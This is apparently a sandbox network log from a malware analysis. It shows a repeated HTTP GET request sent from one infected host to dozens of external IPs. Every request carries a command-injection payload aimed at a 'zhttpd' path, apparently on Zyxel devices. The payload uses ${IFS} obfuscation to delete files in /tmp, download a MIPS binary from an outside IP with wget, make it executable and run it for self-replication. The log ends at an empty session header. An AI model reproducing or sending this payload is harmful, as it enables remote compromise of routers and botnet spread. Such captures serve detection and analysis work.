                                                        Jan 28, 2024 10:12:50.364383936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3899192.168.2.1455968119.89.226.178443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.364413023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3900192.168.2.143359025.237.47.64443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.364447117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3901192.168.2.1449128101.192.146.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.364454985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3902192.168.2.1451632212.148.209.70443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.364514112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3903192.168.2.1445508210.180.74.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.364558935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3904192.168.2.1440304178.6.46.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.364598989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3905192.168.2.1447106203.133.4.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.364633083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3906192.168.2.1457248121.85.153.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.364682913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3907192.168.2.1452882131.151.160.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.364732981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3908192.168.2.1435872158.49.165.124443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.364751101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3909192.168.2.1457122220.23.121.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.364804029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3910192.168.2.1458310211.210.170.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.364839077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3911192.168.2.144581449.110.197.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.364883900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3912192.168.2.1457212180.189.22.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.364912033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3913192.168.2.145012641.100.25.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.364962101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3914192.168.2.144501271.199.39.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.365005016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3915192.168.2.1440004138.136.46.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.365025997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3916192.168.2.1438386155.63.17.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.365046978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3917192.168.2.1440322106.104.125.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.365092039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3918192.168.2.1452540222.156.165.28443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.365135908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3919192.168.2.1459228113.213.243.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.365169048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3920192.168.2.14368249.116.55.53443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.365223885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3921192.168.2.145438088.207.211.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.365243912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3922192.168.2.1447924207.119.2.76443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.365282059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3923192.168.2.143678695.96.41.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.365335941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3924192.168.2.144395813.44.134.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.365367889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3925192.168.2.145761280.242.195.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.365422010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3926192.168.2.1433614195.129.204.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.365459919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3927192.168.2.145262878.48.194.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.365495920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3928192.168.2.1435026177.94.87.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.365524054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3929192.168.2.1443112202.127.180.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.368927956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3930192.168.2.145936284.182.10.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.368953943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3931192.168.2.1455184206.171.70.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.369004965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3932192.168.2.1448758206.122.20.219443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.369054079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3933192.168.2.1440018157.142.181.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.369087934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3934192.168.2.1436632128.20.68.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.369139910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3935192.168.2.143290251.236.243.244443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.369152069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3936192.168.2.1438150116.116.7.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.369185925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3937192.168.2.1458930162.133.83.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.369220018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3938192.168.2.143843847.179.219.115443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.369266987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3939192.168.2.144503281.150.191.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.369297981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3940192.168.2.1434336158.87.182.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.369318962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3941192.168.2.145864843.173.153.73443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.369379997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3942192.168.2.1449036154.51.149.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.369402885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3943192.168.2.144207662.117.34.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.375663042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3944192.168.2.144060448.227.196.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.375695944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3945192.168.2.144113223.144.248.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.375735998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3946192.168.2.145115235.164.115.157443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.375765085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3947192.168.2.145688646.206.142.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.375809908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3948192.168.2.145244895.125.124.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.375874043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3949192.168.2.1460854150.183.245.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.375874043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3950192.168.2.143514834.126.88.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.375919104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3951192.168.2.1445788147.59.3.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.375950098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3952192.168.2.143579438.156.23.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.375996113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3953192.168.2.143372266.93.93.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.376050949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3954192.168.2.143329434.72.249.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.376070023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3955192.168.2.1447780199.169.67.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.376111031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3956192.168.2.1455782148.149.224.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.376167059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3957192.168.2.1436482109.208.139.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.376190901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3958192.168.2.145740265.64.148.141443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:51.376226902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3959192.168.2.1447674131.10.11.57443
                                                        TimestampBytes transferredDirectionData
